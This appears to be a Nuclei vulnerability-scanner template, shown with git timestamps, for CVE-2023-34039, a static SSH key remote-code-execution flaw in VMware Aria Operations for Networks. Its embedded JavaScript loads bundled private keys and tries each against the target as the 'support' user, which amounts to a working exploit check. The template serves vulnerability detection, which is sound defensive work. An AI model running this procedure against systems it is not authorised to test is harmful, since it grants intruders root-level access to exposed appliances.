nuclei-templates/javascript/cves/2023/CVE-2023-34039.yaml

68 lines
2.6 KiB
YAML
Raw Normal View History

2023-11-09 08:07:17 +00:00
id: CVE-2023-34039
2023-11-02 19:06:37 +00:00
info:
2023-11-09 08:07:17 +00:00
name: VMWare Aria Operations - Remote Code Execution
2023-11-02 19:06:37 +00:00
author: tarunKoyalwar
2023-11-09 08:07:17 +00:00
severity: critical
2023-11-02 19:06:37 +00:00
description: |
VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
Version: All versions from 6.0 to 6.10
2023-11-09 08:07:17 +00:00
impact: |
Successful exploitation of this vulnerability can lead to remote code execution or a complete system crash.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
2023-11-02 19:06:37 +00:00
reference:
- https://github.com/sinsinology/CVE-2023-34039.git
2023-11-09 08:07:17 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-34039
- http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html
- https://www.vmware.com/security/advisories/VMSA-2023-0018.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34039
cwe-id: CWE-327
epss-score: 0.21241
epss-percentile: 0.95916
cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:*
2023-11-09 08:07:17 +00:00
metadata:
verified: true
vendor: vmware
product: aria_operations_for_networks
2023-11-09 08:07:17 +00:00
tags: cve,cve2019,vmware,aria,rce
2023-11-02 19:06:37 +00:00
variables:
keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory
2023-11-02 19:06:37 +00:00
javascript:
# init field can be used to make any preperations before the actual exploit
# here we are reading all private keys from helpers folder and storing them in a list
2023-11-02 19:06:37 +00:00
- init: |
let m = require('nuclei/fs');
let privatekeys = m.ReadFilesFromDir(keysDir)
updatePayload('keys',privatekeys)
# check if port is open before bruteforcing
2023-11-02 19:06:37 +00:00
pre-condition: |
isPortOpen(Host,Port)
# actual exploit
2023-11-02 19:06:37 +00:00
code: |
let m = require('nuclei/ssh')
let c = m.SSHClient()
c.ConnectWithKey(Host,Port,'support@'+Host,key) // returns true if connection is successful
args:
Host: "{{Host}}"
Port: "22"
key: "{{keys}}"
keysDir: "{{keysDir}}"
payloads:
# 'keys' will be updated by actual private keys after init is executed
2023-11-09 08:44:00 +00:00
keys:
2023-11-02 19:06:37 +00:00
- dummy1
- dummy2
threads: 10
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- success && response
# digest: 490a004630440220682dc6d4303a779d6391e3d9135dd5025226c2c1bfefb0f27f43fd60cc43df71022033c9c9bcf644b9cef0d133fb6fd9dd7a398bfdb8a425d3f813c98fa467b248d3:922c64590222798bb761d5b6d8e72950